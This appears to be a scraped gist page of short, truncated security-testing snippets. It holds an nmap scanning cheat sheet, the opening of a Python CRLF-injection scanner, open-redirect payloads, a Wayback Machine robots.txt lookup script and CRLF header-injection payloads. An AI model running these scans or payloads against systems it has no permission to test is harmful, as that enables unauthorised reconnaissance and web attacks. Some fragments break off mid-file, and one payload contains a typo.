xs xsa xsxsd
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| COMMAND DESCRIPTION | |
| nmap -sP 10.0.0.0/24 | |
| Ping scans the network, listing machines that respond to ping. | |
| nmap -p 1-65535 -sV -sS -T4 target | |
| Full TCP port scan using with service version detection - usually my first scan, I find T4 more accurate than T5 and still "pretty quick". | |
| nmap -v -sS -A -T4 target | |
| Prints verbose output, runs stealth syn scan, T4 timing, OS and version detection + traceroute and scripts against target services. | |
| nmap -v -sS -A -T5 target | |
| Prints verbose output, runs stealth syn scan, T5 timing, OS and version detection + traceroute and scripts against target services. | |
| nmap -v -sV -O -sS -T5 target |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| ''' | |
| # Command line tool for scanning urls for CRLF injection. | |
| ''' | |
| import sys, getopt | |
| import requests | |
| import eventlet | |
| from termcolor import colored |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //google.com/%2f.. | |
| //[email protected]/%2f.. | |
| ///google.com/%2f.. | |
| ///[email protected]/%2f.. | |
| ////google.com/%2f.. | |
| ////[email protected]/%2f.. | |
| https://google.com/%2f.. | |
| https://[email protected]/%2f.. | |
| /https://google.com/%2f.. | |
| /https://[email protected]/%2f.. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| import sys | |
| from multiprocessing.dummy import Pool | |
| def robots(host): | |
| r = requests.get( | |
| 'https://web.archive.org/cdx/search/cdx\ | |
| ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %0AHeader-Test:BLATRUC | |
| %0A%20Header-Test:BLATRUC | |
| %20%0AHeader-Test:BLATRUC | |
| %23%OAHeader-Test:BLATRUC | |
| %E5%98%8A%E5%98%8DHeader-Test:BLATRUC | |
| %E5%98%8A%E5%98%8D%0AHeader-Test:BLATRUC | |
| %3F%0AHeader-Test:BLATRUC | |
| crlf%0AHeader-Test:BLATRUC | |
| crlf%0A%20Header-Test:BLATRUC | |
| crlf%20%0AHeader-Test:BLATRUC |